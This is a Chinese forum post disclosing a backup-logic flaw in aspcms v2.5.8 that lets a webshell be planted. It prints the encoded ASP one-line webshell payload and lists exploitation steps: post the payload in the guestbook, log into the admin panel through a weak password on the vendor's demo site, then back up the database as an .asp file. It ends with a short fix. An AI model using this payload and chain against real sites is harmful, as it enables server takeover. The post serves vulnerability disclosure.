热搜词
发表于 2017-2-20 21:58:53 | 显示全部楼层 |阅读模式

aspcms后台的备份逻辑存在严重的逻辑问题,可导致一句话木马被“引入”执行

众所周知,对以xxx.asp命名的access数据库,只要插入著名的一句话:

┼攠數畣整爠煥敵瑳∨≡┩愾

访问该asp即可得到webshell


aspcmsv2.5.8 最新版虽然对正在使用的数据库的名字加了#号,导致无法直接访问,但是数据库的备份功能却是直接把数据备份成了 xxx.asp 导致访问备份的数据库网址即可得到webshell


利用过程:

1、在站点前台留言本以 " ┼攠數畣整爠煥敵瑳∨≡┩愾 "做标题留言一则

2、利用我刚提交的aspcms爆后台路径以及http://demo.aspcms.com/ 的弱口令,我轻易的进入了后台。

3、利用后台的备份功能备份数据库,得到存在一句话木马的web地址,得到webshell

s_nopic.gif vcj0="javascript:errimg(this);" src="/uploadfile/Collfiles/20160201/20160201092344152.png" width="600" />


20160201092344153.png

得到webshell,请看图:

20160201092344154.png


解决方案:

后台的备份,不应该自动生成可直接访问的asp文件。


全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-25 07:26 , Processed in 0.170230 second(s), 26 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team